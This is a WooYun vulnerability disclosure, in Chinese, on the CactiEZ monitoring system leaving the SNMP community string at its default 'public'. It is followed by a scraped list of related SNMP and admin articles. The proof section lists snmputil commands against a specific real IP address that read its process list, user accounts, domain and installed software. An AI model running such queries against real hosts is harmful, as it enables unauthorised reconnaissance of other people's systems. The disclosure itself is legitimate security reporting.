snmp使用默认团体名_CactiEZ 中文版snmp默认团体名
漏洞概要
缺陷编号:WooYun-2012-07862
漏洞标题:CactiEZ 中文版snmp默认团体名
相关厂商:CactiEZ 中文版
漏洞作者:南国利剑
提交时间:2012-06-05 12:50
公开时间:2012-06-05 12:50
漏洞类型:重要敏感信息泄露
危害等级:低
自评Rank:2
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
漏洞详情
披露状态:
2012-06-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-06-05: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
CactiEZ 中文版,是一款监控控制系统;其中默认的snmp设置public,没有修改会导致可以远程读取目标设备主机信息。
详细说明:
CactiEZ 中文版,是一款监控控制系统;其中默认的snmp设置public,没有修改导致可以远程读取目标设备主机信息。
漏洞证明:
snmputil.exe walk 120.86.64.156 public .1.3.6.1.2.1.25.4.2.1.2 //**进程列表snmputil.exe walk 120.86.64.156 public .1.3.6.1.4.77.1.2.25.1.1 //**用户列表snmputil.exe get 120.86.64.156 public .1.3.6.1.4.77.1.4.1.0 //**域名snmputil.exe walk 120.86.64.156 public .1.3.6.1.2.1.25.6.3.1.2 //**安装的软件snmputil.exe walk 120.86.64.156 public .1.3.6.1.2.1.1 //**系统信息
修复方案:
修改SNMP默认团体名。
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
评价
2010-01-01 00:00 小贱人 白帽子 | Rank:4 漏洞数:3)
mark
snmp使用默认团体名_CactiEZ 中文版snmp默认团体名相关推荐
- linux修改snmp团体名称,HP-UX修改MP卡的SNMP团体字
HP-UX系统MP登录 MP login: Admin MP password: ***** Hewlett-Packard Integrity Integrated Lights-Out 2 (c) ...
- linux修改snmp端口,Linux或Window是修改snmp的默认端口
SNMP默认端口通讯使用 UDP 161,在安装一些监控软件的过程中,常常提示端口被占用等情况,下面说一下如何修改系统的默认SNMP端口 windows修改snmp端口 1 打开services文件 ...
- 如何在 Windows 10 上安装和配置 SNMP 服务并通过组策略配置 SNMP 设置
简单网络管理协议或 SNMP用于企业网络上的监控.事件通知和网络设备管理.该协议由一组网络管理标准组成,包括应用层协议.数据库模式和一组数据对象.SNMP 可以从任何网络设备接收各种类型的信息(正常运 ...
- java snmp全面开发解决方案(web service snmp网关、代理snmp网关、网络拓扑发现、SNMP数据采集等)...
ObjectSNMP是一个面向对象的SNMP开发组件,与关系数据库流行的O-R Mapping技术类似,实现了Object到SNMP MIB的操作映射(简称O-M Mapping),系统提供了Java ...
- java8 接口调用默认方法_Java8接口里的默认方法特性
在没有默认方法特性时,当你往接口中添加新方法时,接口内部所有实现的类都要历经一些修改,这将导致上千行的代码修改工作量.为了避免这点,Java8引入了默认对象方法,亦即,如果你想要往现存的接口中添加任何 ...
- oracle数据库全数据库名,Oracle数据库中的 数据库域名、数据库名、全局数据库名、SID、数据库实例名、服务名 解释...
菜鸟雷区 在配置listener.ora 和 tnsnames.ora 连接Oracle数据库服务器时,我们需要把 以下容易混淆的概念区分开来 数据库域名 数据库名 全局数据库名 SID 数据库实例名 ...
- oracle修改表中字段名,oracle如何修改表字段名
oracle修改表字段名的方法是: 首先bai方法是使用RENAME关键字: 修改字段名:alter table 表名 rename column 现列zhi名 to 新列名;修改表名:alter t ...
- debain修改服务器网卡名,Debian 系统修改网卡ens33名称为 eth0
1. 编辑文件 /etc/default/grub 修改下面的值 初始值 GRUB_CMDLINE_LINUX="" 修改后 GRUB_CMDLINE_LINUX="ne ...
- 【主机名变bogon】linux主机名被更改为bogon原理分析
博客原址:http://blog.csdn.net/weiwan721/article/details/48463371 问题描述: 操作系统为RHEL6.5,安装时使用的是默认主机名localhos ...
- linux目录默认权限是什么,linux文件目录默认权限(详解)
1.文件的默认权限是没有x的,即文件的最大默认权限为666(-rw-rw-rw) 2.由于进入目录和目录的x权限有关,故目录的最大默认权限为777(drwxrwxrwx) 查看默认权限需要使用umas ...
最新文章
- new vue 方法参数_vue源码解析 lt;1gt; 数据驱动
- Spring学习笔记(三) AOP_annotation,AOP_XML
- everything文件搜索_Everything,闪电搜索,百万文件100%秒搜,真是文件搜索神器!...
- HDU5178 pairs【二分法】【尺取法】
- Android查看真机布局,android-外部存储
- linux 分卷解压
- android eclipse自动更新,Android Eclipse 升级ADT到24.0.2完美解决方案
- 「管理数学基础」2.4 泛函分析:有界线性算子与泛函、例题
- java中EL表达式怎么获取网站的根目录
- 令牌桶 java_令牌桶算法及实现(三)
- php架构师生涯一个月总结
- 算加权成绩(MATLAB)
- 【Jmeter+ant+Jenkins自动化持续集成】
- 数值分析原理课程实验——牛顿(Newton)迭代法
- java 滑杆和进度条_进度条 和 滑条
- nextclou安装配置和优化
- pdf怎么拆分成几个部分?怎么拆分pdf中的一部分?
- Python利用Face++实现身份证件图片识别
- linux设置简单的密码
- 校验码中码距与纠错能力的关系